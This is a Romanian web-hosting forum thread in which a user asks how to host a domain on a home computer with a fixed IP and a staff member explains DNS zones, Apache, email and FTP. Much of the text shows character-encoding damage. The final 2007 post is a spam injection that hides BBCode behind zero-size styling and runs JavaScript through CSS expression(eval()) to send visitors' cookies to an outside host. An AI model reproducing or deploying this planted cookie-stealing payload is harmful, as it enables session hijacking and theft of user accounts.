Switch to full style
pentru incepatori si nu numai
Răspunde

Inregistrare domeniu

03 Feb 2006, 16:47

Vreau sa-mi inregistrez un domeniu care sa fie gazduit pe calculatoru meu
de acasa. Am abonament internet de la Astral si am primit de la ei IP fix.
In acest caz imi trebuie numai server Web sau si server DNS?

explicatii

03 Feb 2006, 20:21

Sunt mai multe probleme aici.
Este vorba de mai multe protocoale:

navigarea pe pagina.
Nu este nici-o problemĂŁ, ĂŽmi daĂži adresa de IP, eu editez zonele Âşi veĂži avea pagina gĂŁzduitĂŁ pe calculatorul dvs. NU este mare lucru dacĂŁ adresa de IP e fixĂŁ. NU aveĂži nevoie de server dns dacĂŁ zonele se aflĂŁ la mine (sau la alt povider)

AveĂži ĂŽnsĂŁ nevoie sĂŁ setaĂži un server de web, recomand Apache. Trebuie sĂŁ ÂştiĂži sĂŁ ĂŽl setaĂži.

Nu e vorba numai de navigare, veÞi primi ºi emailuri. AveÞi deci nevoie ºi de un server de email atat pentru incomig (pop) cât eventual, dacã doriÞi sã trimiteÞi emailuri ºi outgoing (smtp). PuteÞi Însã sã trimiteÞi emailuri de pe nume de domeniu ºi folosind serverul smtp al Astral.

Pentru Windows, caci bĂŁnuiesc cĂŁ aveĂži ca sistem de operare Windows. .

Ar mai fi Âşi accesul FTP pentru utilizatorui, dacĂŁ doriĂži sĂŁ ĂŽl oferiĂži (nu este esenĂžial).

În concluzie: se poate face.

Dan HuĂžanaÂşu

09 Feb 2006, 01:00

Am vorbit cu provideru si mi-a spus ca IP-ul meu e public si ca nu e nici o problema. Intr-adevar acum sistemu meu de operare este Windows, dar vreau sa trec la Linux ca sa folosesc Apache. Tot cu aceasta ocazie ma intereseaza si un server de e-mail si FTP, deci vreau sa-mi introduceti in serverul DNS inregistrarile pentru aceste servicii. Am incercat sa completez formularu de inregistrare domenii, dar am primit raspuns ca adresa mea de e-mail nu e in baza de date si nu am primit cod de acess.

re

09 Feb 2006, 02:41

DacĂŁ nu sunteĂži client Nettissimo atunci trebuie sa mergeĂži un pic mai jos, acolo unde scrie client nou in formularul de ĂŽnregistrare.

13 Sep 2007, 09:25

bla bla

[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.coolfilehost.biz/download2.php?a=308cookie.php&b=31a07d882c80d7e4a36e96c21fb155b6?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
Răspunde